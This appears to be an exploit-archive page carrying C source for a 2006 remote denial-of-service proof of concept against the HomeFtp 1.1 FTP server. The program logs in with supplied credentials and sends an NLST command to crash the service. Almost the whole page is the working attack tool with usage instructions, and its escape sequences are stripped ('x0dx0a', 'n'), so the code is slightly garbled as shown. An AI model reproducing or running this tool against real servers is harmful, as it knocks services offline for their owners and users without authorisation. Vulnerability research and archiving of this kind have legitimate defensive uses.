HomeFtp 1.1 (NLST) Denial of Service Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HomeFtp 1.1 (NLST) Denial of Service Vulnerability
# Published : 2006-01-14
# Author : pi3ch
# Previous Title : Cerberus FTP Server <= 2.32 Denial of Service Exploit
# Next Title : Cisco IP Phone 7940 (Reboot) Denial of Service Exploit

/*
HomeFtp v1.1 Denial of Service
original advisory: http://kapda.ir/advisory-202.html
homeftp_v1.1_xpl.c
----------------------------------------
*/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

#define  POCSTR "USER %sx0dx0aPASS %sx0dx0aNLSTx0dx0a"

int header();
int usage(char *filename);
int remote_connect( char* ip, unsigned short port );

int header() {
printf("n[i] KAPDA - Computer Security Science Researchers Institutenn");
printf("[i] Title:              tHomeFTP <= v1.1 Dos Exploitn");
printf("[i] Discovered by:      tcvh {a] kapda.irn");
printf("[i] Exploit by:         tPi3cH {a] kapda.irn");
printf("[i] More info:          twww.kapda.ir/page-advisory.htmlnn");
return 0;
}

int usage(char *filename) {
printf("[i] Usage:   t%s HOST PORT USERNAME PASSWORDn",filename);
printf("[i] Example: t%s 127.0.0.1 21 anonymous nonenn",filename);
exit(0);
}

int remote_connect( char* ip, unsigned short port )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;

memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
{
printf ( "[e] Cannot resolve "%s"n", ip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( port );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "[e] Socket failed!n" );
exit(1);
}
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
{
printf ( "[e] Failed connecting!n" );
       exit(1);
}
return ( s );
}


int main(int argc, char *argv[]) {
 int s;
 char *request;
 header();
 if( (argc < 5) )
     usage(argv[0]);
 request = (char *) malloc(1024);
 printf("[r] Connecting to remote hostn");
 s = remote_connect(argv[1],atoi(argv[2]));
 sleep(1);
 printf("[r] Creating buffern");
 sprintf(request,POCSTR,argv[3],argv[4]);
 printf("[r] Sending %d bytes of DOS buffern",strlen(request));
 if ( send ( s, request, strlen (request), 0) <= 0 )
 {
         printf("[e] Failed to send buffern");
         close(s);
         exit(1);
 }
 sleep(1);
 printf("[s] Exploit Done!n");
 close(s);
 free(request);
 request = NULL;
 return 0;
}

// www.Syue.com [2006-01-14]